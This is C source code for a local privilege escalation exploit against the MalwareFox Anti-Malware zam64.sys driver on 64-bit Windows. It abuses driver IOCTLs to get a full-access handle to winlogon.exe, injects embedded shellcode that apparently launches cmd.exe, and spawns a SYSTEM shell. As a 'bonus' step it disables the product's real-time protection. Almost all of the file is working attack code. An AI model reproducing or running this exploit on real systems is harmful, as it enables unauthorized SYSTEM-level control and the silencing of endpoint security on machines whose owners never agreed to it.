
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buf ;
typedef int LPVOID ;
typedef scalar_t__ HANDLE ;
typedef int DWORD ;


 scalar_t__ CreateFile (char*,int,int ,int *,int ,int ,int *) ;
 int CreateRemoteThread (scalar_t__,int *,int ,int ,int *,int ,int *) ;
 int DeviceIoControl (scalar_t__,int,int *,int,scalar_t__*,int,int *,int *) ;
 int FILE_ATTRIBUTE_NORMAL ;
 int GENERIC_READ ;
 int GENERIC_WRITE ;
 int GetWinlogonPID () ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int MEM_COMMIT ;
 int MEM_RESERVE ;
 int OPEN_EXISTING ;
 int PAGE_EXECUTE_READWRITE ;
 int RegisterProcessByCommunicationPort () ;
 int VirtualAllocEx (scalar_t__,int *,int,int,int ) ;
 int WriteProcessMemory (scalar_t__,int ,unsigned char*,int,int *) ;
 int printf (char*) ;

int main(int argc, char** argv)
{
 DWORD BytesReturned;
 DWORD winlogon_pid;
 HANDLE winlogon_handle;
 LPVOID RemoteAllocation;
 HANDLE hDevice;

 printf("===      MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation      ===\n");
 printf("                              Tested on Windows 10 64-bit                                \n");
 printf("                                   Souhail Hammou                                      \n\n");
 printf("[*] Stage 1: Registering the process with the driver by connecting to the minifilter communication port\n");

 hDevice = CreateFile
  ("\\\\.\\ZemanaAntiMalware",
   GENERIC_READ | GENERIC_WRITE,
   0,
   ((void*)0),
   OPEN_EXISTING,
   FILE_ATTRIBUTE_NORMAL,
   ((void*)0)
   );
 if (hDevice == INVALID_HANDLE_VALUE)
 {
  return 0;
 }


 if (!RegisterProcessByCommunicationPort())
 {
  printf("\t[-] Registration Failed !\n");
  return 0;
 }

 printf("\t[+] Process registered.\n[*] Stage 2: \n");

 printf("\t[+] Getting Winlogon's PID\n");
 winlogon_pid = GetWinlogonPID();

 if (!winlogon_pid)
 {
  printf("\t[-] GetWinlogonPID() failed !\n");
  return 0;
 }

 printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");






 if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, ((void*)0)))
 {
  printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
  return 0;
 }

 printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");

 if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, ((void*)0), 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
 {
  printf("\t[-] VirtualAllocEx failed !\n");
  return 0;
 }

 printf("\t[+] Writing shellcode to allocated memory\n");


 unsigned char buf[] =
  "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
  "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
  "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
  "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
  "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
  "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
  "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
  "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
  "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
  "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
  "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
  "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
  "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
  "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
  "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
  "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";

 if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
 {
  printf("\t[-] WriteProcessMemory Failed !\n");
  return 0;
 }

 printf("\t[+] Spawning SYSTEM shell\n");
 if (!CreateRemoteThread(winlogon_handle, ((void*)0), 0, RemoteAllocation, ((void*)0), 0, ((void*)0)))
 {
  printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
  return 0;
 }

 printf("[*] Bonus:\n\t[+] Disabling real-time protection\n");
 if (!DeviceIoControl(hDevice, 0x80002090, ((void*)0), 0, ((void*)0), 0, &BytesReturned, ((void*)0)))
 {
  printf("\t[-] DeviceIoControl 0x80002090 failed !\n");
  return 0;
 }
 printf("\t[+] RT protection disabled.");
 return 0;
}
